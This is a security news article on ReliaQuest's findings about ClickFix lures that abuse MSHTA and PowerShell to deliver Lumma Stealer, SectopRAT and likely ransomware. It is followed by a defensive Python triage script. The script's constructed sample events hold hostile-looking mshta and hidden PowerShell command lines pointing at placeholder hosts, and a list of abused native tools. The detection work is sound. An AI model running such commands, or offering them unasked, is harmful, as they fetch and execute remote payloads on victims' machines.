
Security researchers have warned of the growing use of ClickFix social engineering techniques to bypass security controls, deploy infostealers and remote access Trojans (RATs), and help ransomware campaigns.
ClickFix tricks users into executing malicious commands by urging them to fix a non-existent problem through a series of steps, often using fake pop-ups to add legitimacy.
ReliaQuest claimed in its latest Threat Spotlight report for March-May 2025 that ClickFix was key in propelling detected drive-by compromises up by 10% over the previous reporting period.
It also enabled an increase in attacks using MSHTA, a native Windows binary for running HTML application files. Because this is a legitimate tool, it enables threat actors to bypass traditional security controls designed to detect file-based delivery methods like phishing, the report noted.
“In the previous reporting period, the rise in MSHTA abuse was largely attributed to ‘ClearFake,’ a JavaScript framework that used deceptive CAPTCHAs to convince users to execute malicious MSHTA commands,” it continued.
“ClearFake’s early adoption of ClickFix techniques propelled MSHTA from 16th to second place among defense evasion tactics.”
MSHTA now accounts for a third of defense evasion attacks, ReliaQuest said.
The report revealed that ClickFix is also being used to deploy Lumma Stealer and “SectopRAT,” a .NET-based RAT.
“Attackers leveraged ClickFix and a malvertising campaign using fake Google ads to distribute malicious Google Chrome installers hiding the malware,” the report said.
“Both methods allowed attackers to exfiltrate credentials and establish backdoors for further exploitation, making SectopRAT a rising threat.”
ClickFix is a potentially “game-changing initial access technique,” ReliaQuest warned, arguing that it’s helping adversaries deliver payloads successfully through trusted tools like PowerShell.
Ransomware Actors Take Up ClickFix
The threat intelligence firm claimed that ClickFix is likely to gain traction among ransomware actors.
“ClickFix’s ability to evade detection by using trusted tools like MSHTA makes it a highly appealing technique for ransomware operators,” it concluded.
“Currently used in malware campaigns, ClickFix has proven highly effective at bypassing traditional defenses such as email filters and endpoint protection. Given its success, we anticipate that 30% of RaaS affiliates will integrate this technique in the short term, streamlining operations and scaling their campaigns.”
ReliaQuest urged organizations to restrict access to the Windows Run prompt for non-admin users in order to prevent attackers from using it during ClickFix campaigns.
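The MSHTA and Run-prompt abuse described above can be triaged from process-creation telemetry. The following is an added example (not ReliaQuest's code or anything from the report) that assumes a Sysmon-style feed with parent image, image and command line fields; the events are constructed samples, and the ClickFix indicator used is a native tool such as mshta.exe or powershell.exe spawned by explorer.exe (the parent of anything launched from the Run prompt) with a remote URL on its command line.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style), not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://example.invalid/verify.hta"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "https://example.invalid/step.txt"'},
    {"parent": r"C:\Program Files\App\app.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta C:\Program Files\App\help.hta"},  # local HTA, not from the shell
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad"},
]

# Native Windows binaries commonly pasted into the Run prompt in ClickFix lures.
NATIVE_TOOLS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
# explorer.exe is the parent of processes started from the Run prompt; it is also
# the parent of ordinary double-click launches, so the URL test below does the
# real discrimination and the match is a triage lead, not proof of compromise.
SHELL_PARENT = "explorer.exe"


def basename(path: str) -> str:
    """Case-insensitive file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_clickfix_candidate(event: dict) -> bool:
    """True when a native tool was spawned by the shell with a remote URL in its arguments."""
    return (basename(event["parent"]) == SHELL_PARENT
            and basename(event["image"]) in NATIVE_TOOLS
            and URL_RE.search(event["cmdline"]) is not None)


def triage(events: list) -> list:
    """Return the command lines of events that match the ClickFix indicator."""
    return [e["cmdline"] for e in events if is_clickfix_candidate(e)]


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print("ClickFix candidate:", hit)
```

In a real deployment the same predicate is expressed as an EDR or SIEM rule over the equivalent fields, and the local-HTA event above shows why the URL condition is needed to keep legitimate MSHTA use out of the alert queue.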